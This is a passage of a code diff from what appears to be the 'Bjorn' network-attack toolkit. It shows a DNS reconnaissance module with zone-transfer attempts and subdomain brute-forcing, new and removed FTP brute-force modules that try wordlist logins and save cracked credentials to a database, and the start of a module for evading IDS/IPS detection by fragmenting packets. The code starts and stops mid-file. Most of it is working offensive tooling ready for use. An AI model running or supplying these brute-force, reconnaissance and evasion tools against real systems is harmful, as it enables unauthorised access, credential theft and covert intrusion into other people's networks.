results["errors"].append("Subdomain enumeration skipped: no domain found")
self.shared_data.bjorn_progress = "95%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 5: Save results and update DB (95% -> 100%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "saving"}
logger.info(f"[{ip}] Phase 5: Saving results")
# Save JSON output
self._save_results(ip, results)
# Update DB hostname if reverse DNS discovered new data
if reverse_hostname and mac:
self._update_db_hostname(mac, ip, reverse_hostname)
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Records: {sum(len(v) for v in results['records'].values())} | Subdomains: {len(results['subdomains'])}")
# Summary comment
record_count = sum(len(v) for v in results["records"].values())
zone_count = sum(len(v) for v in results["zone_transfer"].values())
sub_count = len(results["subdomains"])
self.shared_data.comment_params = {
"ip": ip,
"domain": domain or "N/A",
"records": str(record_count),
"zones": str(zone_count),
"subdomains": str(sub_count),
}
logger.success(
f"[{ip}] DNS Pillager complete: domain={domain}, "
f"records={record_count}, zone_transfers={zone_count}, subdomains={sub_count}"
)
return "success"
except Exception as e:
logger.error(f"[{ip}] DNSPillager execute failed: {e}")
results["errors"].append(str(e))
# Still try to save partial results
try:
self._save_results(ip, results)
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
# --------------------- Reverse DNS ---------------------
def _reverse_dns(self, ip: str) -> Optional[str]:
"""Perform reverse DNS lookup on the IP address."""
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
rev_name = dns.reversename.from_address(ip)
answers = self._resolver.resolve(rev_name, "PTR")
for rdata in answers:
hostname = str(rdata).rstrip(".")
if hostname:
return hostname
except Exception as e:
logger.debug(f"dnspython reverse DNS failed for {ip}: {e}")
# Socket fallback
try:
hostname, _, _ = socket.gethostbyaddr(ip)
if hostname and hostname != ip:
return hostname
except (socket.herror, socket.gaierror, OSError) as e:
logger.debug(f"Socket reverse DNS failed for {ip}: {e}")
return None
# --------------------- Domain extraction ---------------------
@staticmethod
def _extract_domain(hostname: str) -> Optional[str]:
"""
Extract the registerable domain from a hostname.
e.g., 'mail.sub.example.com' -> 'example.com'
'host1.internal.lan' -> 'internal.lan'
'192.168.1.1' -> None
"""
if not hostname:
return None
# Skip raw IPs
hostname = hostname.strip().rstrip(".")
parts = hostname.split(".")
if len(parts) < 2:
return None
# Check if it looks like an IP address
try:
socket.inet_aton(hostname)
return None # It's an IP, not a hostname
except (socket.error, OSError):
pass
# For simple TLDs, take the last 2 parts
# For compound TLDs (co.uk, com.au), take the last 3 parts
compound_tlds = {
"co.uk", "co.jp", "co.kr", "co.nz", "co.za", "co.in",
"com.au", "com.br", "com.cn", "com.mx", "com.tw",
"org.uk", "net.au", "ac.uk", "gov.uk",
}
if len(parts) >= 3:
possible_compound = f"{parts[-2]}.{parts[-1]}"
if possible_compound.lower() in compound_tlds:
return ".".join(parts[-3:])
return ".".join(parts[-2:])
# --------------------- DNS record queries ---------------------
def _query_records(self, domain: str, record_type: str) -> List[str]:
"""Query DNS records of a given type for a domain."""
records = []
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(domain, record_type)
for rdata in answers:
value = str(rdata).rstrip(".")
if value:
records.append(value)
return records
except dns.resolver.NXDOMAIN:
logger.debug(f"NXDOMAIN for {domain} {record_type}")
except dns.resolver.NoAnswer:
logger.debug(f"No answer for {domain} {record_type}")
except dns.resolver.NoNameservers:
logger.debug(f"No nameservers for {domain} {record_type}")
except dns.exception.Timeout:
logger.debug(f"Timeout querying {domain} {record_type}")
except Exception as e:
logger.debug(f"dnspython query failed for {domain} {record_type}: {e}")
# Socket fallback (limited to A records only)
if record_type == "A" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} A: {e}")
# Socket fallback for AAAA
if record_type == "AAAA" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET6, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} AAAA: {e}")
return records
# --------------------- Zone transfer (AXFR) ---------------------
def _attempt_zone_transfer(self, domain: str, nameserver: str) -> List[Dict]:
"""
Attempt an AXFR zone transfer from a nameserver.
Returns a list of record dicts on success, empty list on failure.
"""
if not _HAS_DNSPYTHON:
return []
records = []
# Resolve NS hostname to IP if needed
ns_ip = self._resolve_ns_to_ip(nameserver)
if not ns_ip:
logger.debug(f"Cannot resolve NS {nameserver} to IP, skipping AXFR")
return []
try:
zone = dns.zone.from_xfr(
dns.query.xfr(ns_ip, domain, timeout=10, lifetime=30)
)
for name, node in zone.nodes.items():
for rdataset in node.rdatasets:
for rdata in rdataset:
records.append({
"name": str(name),
"type": dns.rdatatype.to_text(rdataset.rdtype),
"ttl": rdataset.ttl,
"value": str(rdata),
})
except dns.exception.FormError:
logger.debug(f"AXFR refused by {nameserver} ({ns_ip}) for {domain}")
except dns.exception.Timeout:
logger.debug(f"AXFR timeout from {nameserver} ({ns_ip}) for {domain}")
except ConnectionError as e:
logger.debug(f"AXFR connection error from {nameserver}: {e}")
except OSError as e:
logger.debug(f"AXFR OS error from {nameserver}: {e}")
except Exception as e:
logger.debug(f"AXFR failed from {nameserver} ({ns_ip}) for {domain}: {e}")
return records
def _resolve_ns_to_ip(self, nameserver: str) -> Optional[str]:
"""Resolve a nameserver hostname to an IP address."""
ns = nameserver.strip().rstrip(".")
# Check if already an IP
try:
socket.inet_aton(ns)
return ns
except (socket.error, OSError):
pass
# Try to resolve
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(ns, "A")
for rdata in answers:
return str(rdata)
except Exception:
pass
# Socket fallback
try:
result = socket.getaddrinfo(ns, 53, socket.AF_INET, socket.SOCK_STREAM)
if result:
return result[0][4][0]
except Exception:
pass
return None
# --------------------- Subdomain enumeration ---------------------
def _load_wordlist(self) -> List[str]:
"""Load subdomain wordlist from file or use built-in list."""
# Check for configured wordlist path
wordlist_path = ""
if hasattr(self.shared_data, "config") and self.shared_data.config:
wordlist_path = self.shared_data.config.get("dns_wordlist", "")
if wordlist_path and os.path.isfile(wordlist_path):
try:
with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
words = [line.strip() for line in f if line.strip() and not line.startswith("#")]
if words:
logger.info(f"Loaded {len(words)} subdomains from {wordlist_path}")
return words
except Exception as e:
logger.error(f"Failed to load wordlist {wordlist_path}: {e}")
logger.info(f"Using built-in subdomain wordlist ({len(BUILTIN_SUBDOMAINS)} entries)")
return list(BUILTIN_SUBDOMAINS)
def _enumerate_subdomains(
self, domain: str, wordlist: List[str], thread_count: int
) -> List[Dict]:
"""
Brute-force subdomain enumeration using ThreadPoolExecutor.
Returns a list of discovered subdomain dicts.
"""
discovered: List[Dict] = []
total = len(wordlist)
if total == 0:
return discovered
completed = [0] # mutable counter for thread-safe progress
def check_subdomain(sub: str) -> Optional[Dict]:
"""Check if a subdomain resolves."""
if self.shared_data.orchestrator_should_exit:
return None
fqdn = f"{sub}.{domain}"
result = None
# Try dnspython
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(fqdn, "A")
ips = [str(rdata) for rdata in answers]
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "dns",
}
except Exception:
pass
# Socket fallback
if result is None:
try:
addr_info = socket.getaddrinfo(fqdn, None, socket.AF_INET, socket.SOCK_STREAM)
ips = list(set(info[4][0] for info in addr_info))
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "socket",
}
except (socket.gaierror, OSError):
pass
# Update progress atomically
with self._lock:
completed[0] += 1
# Progress: 45% -> 95% across subdomain enumeration
pct = 45 + int((completed[0] / total) * 50)
pct = min(pct, 95)
self.shared_data.bjorn_progress = f"{pct}%"
return result
try:
with ThreadPoolExecutor(max_workers=thread_count) as executor:
futures = {
executor.submit(check_subdomain, sub): sub for sub in wordlist
}
for future in as_completed(futures):
if self.shared_data.orchestrator_should_exit:
# Cancel remaining futures
for f in futures:
f.cancel()
logger.info("Subdomain enumeration interrupted by orchestrator.")
break
try:
result = future.result(timeout=15)
if result:
with self._lock:
discovered.append(result)
logger.info(
f"Subdomain found: {result['fqdn']} -> {result['ips']}"
)
self.shared_data.comment_params = {
"ip": domain,
"phase": "subdomains",
"found": str(len(discovered)),
"last": result["fqdn"],
}
except Exception as e:
logger.debug(f"Subdomain future error: {e}")
except Exception as e:
logger.error(f"Subdomain enumeration thread pool error: {e}")
return discovered
# --------------------- Result saving ---------------------
def _save_results(self, ip: str, results: Dict) -> None:
"""Save DNS reconnaissance results to a JSON file."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
safe_ip = ip.replace(":", "_").replace(".", "_")
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"dns_{safe_ip}_{timestamp}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
with open(filepath, "w", encoding="utf-8") as f:
json.dump(results, f, indent=2, default=str)
logger.info(f"Results saved to {filepath}")
except Exception as e:
logger.error(f"Failed to save results for {ip}: {e}")
# --------------------- DB hostname update ---------------------
def _update_db_hostname(self, mac: str, ip: str, new_hostname: str) -> None:
"""Update the hostname in the hosts DB table if we found new DNS data."""
if not mac or not new_hostname:
return
try:
rows = self.shared_data.db.query(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if not rows:
return
existing = rows[0].get("hostnames") or ""
existing_set = set(h.strip() for h in existing.split(";") if h.strip())
if new_hostname not in existing_set:
existing_set.add(new_hostname)
updated = ";".join(sorted(existing_set))
self.shared_data.db.execute(
"UPDATE hosts SET hostnames=? WHERE mac_address=?",
(updated, mac),
)
logger.info(f"Updated DB hostname for MAC {mac}: added {new_hostname}")
# Refresh our local cache
self._refresh_ip_identity_cache()
except Exception as e:
logger.error(f"Failed to update DB hostname for MAC {mac}: {e}")
# ---------------------------------------------------------------------------
# CLI mode (debug / manual execution)
# ---------------------------------------------------------------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
pillager = DNSPillager(shared_data)
logger.info("DNS Pillager module ready (CLI mode).")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 53
logger.info(f"Execute DNSPillager on {ip}:{port} ...")
status = pillager.execute(ip, str(port), row, "dns_pillager")
if status == "success":
logger.success(f"DNS recon successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"DNS recon interrupted for {ip}:{port}.")
break
else:
logger.failed(f"DNS recon failed for {ip}:{port}.")
logger.info("DNS Pillager CLI execution completed.")
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

165
actions/freya_harvest.py Normal file
View File

@@ -0,0 +1,165 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
freya_harvest.py -- Data collection and intelligence aggregation for BJORN.
Monitors output directories and generates consolidated reports.
"""
import os
import json
import glob
import threading
import time
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="freya_harvest.py")
# -------------------- Action metadata --------------------
b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_status = "freya_harvest"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 50
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # Local file processing is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["harvest", "report", "aggregator", "intel"]
b_category = "recon"
b_name = "Freya Harvest"
b_description = "Aggregates findings from all modules into consolidated intelligence reports."
b_author = "Bjorn Team"
b_version = "2.0.4"
b_icon = "FreyaHarvest.png"
b_args = {
"input_dir": {
"type": "text",
"label": "Input Data Dir",
"default": "/home/bjorn/Bjorn/data/output"
},
"output_dir": {
"type": "text",
"label": "Reports Dir",
"default": "/home/bjorn/Bjorn/data/reports"
},
"watch": {
"type": "checkbox",
"label": "Continuous Watch",
"default": True
},
"format": {
"type": "select",
"label": "Report Format",
"choices": ["json", "md", "all"],
"default": "all"
}
}
class FreyaHarvest:
def __init__(self, shared_data):
self.shared_data = shared_data
self.data = defaultdict(list)
self.lock = threading.Lock()
self.last_scan_time = 0
def _collect_data(self, input_dir):
"""Scan directories for JSON findings."""
categories = ['wifi', 'topology', 'webscan', 'packets', 'hashes']
new_findings = 0
for cat in categories:
cat_path = os.path.join(input_dir, cat)
if not os.path.exists(cat_path): continue
for f_path in glob.glob(os.path.join(cat_path, "*.json")):
if os.path.getmtime(f_path) > self.last_scan_time:
try:
with open(f_path, 'r', encoding='utf-8') as f:
finds = json.load(f)
with self.lock:
self.data[cat].append(finds)
new_findings += 1
except: pass
if new_findings > 0:
logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
self.shared_data.log_milestone(b_class, "DataHarvested", f"Found {new_findings} new items")
self.last_scan_time = time.time()
def _generate_report(self, output_dir, fmt):
"""Generate consolidated findings report."""
if not any(self.data.values()):
return
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
os.makedirs(output_dir, exist_ok=True)
if fmt in ['json', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.json")
with open(out_file, 'w') as f:
json.dump(dict(self.data), f, indent=4)
self.shared_data.log_milestone(b_class, "ReportGenerated", f"JSON: {os.path.basename(out_file)}")
if fmt in ['md', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.md")
with open(out_file, 'w') as f:
f.write(f"# Bjorn Intelligence Report - {ts}\n\n")
for cat, items in self.data.items():
f.write(f"## {cat.capitalize()}\n- Items: {len(items)}\n\n")
self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
def execute(self, ip, port, row, status_key) -> str:
input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
watch = getattr(self.shared_data, "freya_harvest_watch", True)
fmt = getattr(self.shared_data, "freya_harvest_format", "all")
timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
start_time = time.time()
try:
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
self._collect_data(input_dir)
self._generate_report(output_dir, fmt)
# Progress
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if not watch:
break
time.sleep(30) # Scan every 30s
self.shared_data.log_milestone(b_class, "Complete", "Harvesting session finished.")
except Exception as e:
logger.error(f"FreyaHarvest error: {e}")
return "failed"
return "success"
if __name__ == "__main__":
from init_shared import shared_data
harvester = FreyaHarvest(shared_data)
harvester.execute("0.0.0.0", None, {}, "freya_harvest")

282
actions/ftp_bruteforce.py Normal file
View File

@@ -0,0 +1,282 @@
"""
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='ftp')
- Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
"""
import os
import threading
import logging
import time
from ftplib import FTP
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_bruteforce"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class FTPBruteforce:
"""Wrapper orchestrateur -> FTPConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_bruteforce = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""Lance le bruteforce FTP pour (ip, port)."""
return self.ftp_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "FTPBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""Gère les tentatives FTP, persistance DB, mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- FTP ----------
def ftp_connect(self, adresse_ip: str, user: str, password: str, port: int = 21) -> bool:
timeout = float(getattr(self.shared_data, "ftp_connect_timeout_s", 3.0))
try:
conn = FTP()
conn.connect(adresse_ip, port, timeout=timeout)
conn.login(user, password)
try:
conn.quit()
except Exception:
pass
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception:
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ftp',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ftp'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for FTP bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ftp_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Pause configurable entre chaque tentative FTP
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
time.sleep(self.shared_data.timewait_ftp)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"FTP dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="ftp",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass
if __name__ == "__main__":
try:
sd = SharedData()
ftp_bruteforce = FTPBruteforce(sd)
logger.info("FTP brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,190 +0,0 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords) + 1 # Include one for the anonymous attempt
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

167
actions/heimdall_guard.py Normal file
View File

@@ -0,0 +1,167 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
heimdall_guard.py -- Stealth operations and IDS/IPS evasion for BJORN.
Handles packet fragmentation, timing randomization, and TTL manipulation.
Requires: scapy.
"""
import os
import json
import random
import time
import threading
import datetime
from collections import deque
from typing import Any, Dict, List, Optional
try:
from scapy.all import IP, TCP, Raw, send, conf
HAS_SCAPY = True
except ImportError:
HAS_SCAPY = False
IP = TCP = Raw = send = conf = None
from logger import Logger
logger = Logger(name="heimdall_guard.py")
# -------------------- Action metadata --------------------
b_class = "HeimdallGuard"
b_module = "heimdall_guard"
b_status = "heimdall_guard"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "stealth"
b_priority = 10
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # This IS the stealth module
b_risk_level = "low"
b_enabled = 1
b_tags = ["stealth", "evasion", "pcap", "network"]
b_category = "defense"
b_name = "Heimdall Guard"
b_description = "Advanced stealth module that manipulates traffic to evade IDS/IPS detection."
b_author = "Bjorn Team"
b_version = "2.0.3"
b_icon = "HeimdallGuard.png"
b_args = {
"interface": {
"type": "text",
"label": "Interface",
"default": "eth0"
},
"mode": {
"type": "select",
"label": "Stealth Mode",
"choices": ["timing", "fragmented", "all"],
"default": "all"
},
"delay": {
"type": "number",
"label": "Base Delay (s)",
"min": 0.1,
"max": 10.0,
"step": 0.1,
"default": 1.0
}
}
class HeimdallGuard:
def __init__(self, shared_data):
self.shared_data = shared_data
self.packet_queue = deque()
self.active = False
self.lock = threading.Lock()
self.stats = {
'packets_processed': 0,
'packets_fragmented': 0,
'timing_adjustments': 0
}
def _fragment_packet(self, packet, mtu=1400):
"""Fragment IP packets to bypass strict IDS rules."""
if IP in packet:
try:
payload = bytes(packet[IP].payload)
max_size = mtu - 40 # conservative
frags = []
offset = 0
while offset < len(payload):
chunk = payload[offset:offset + max_size]
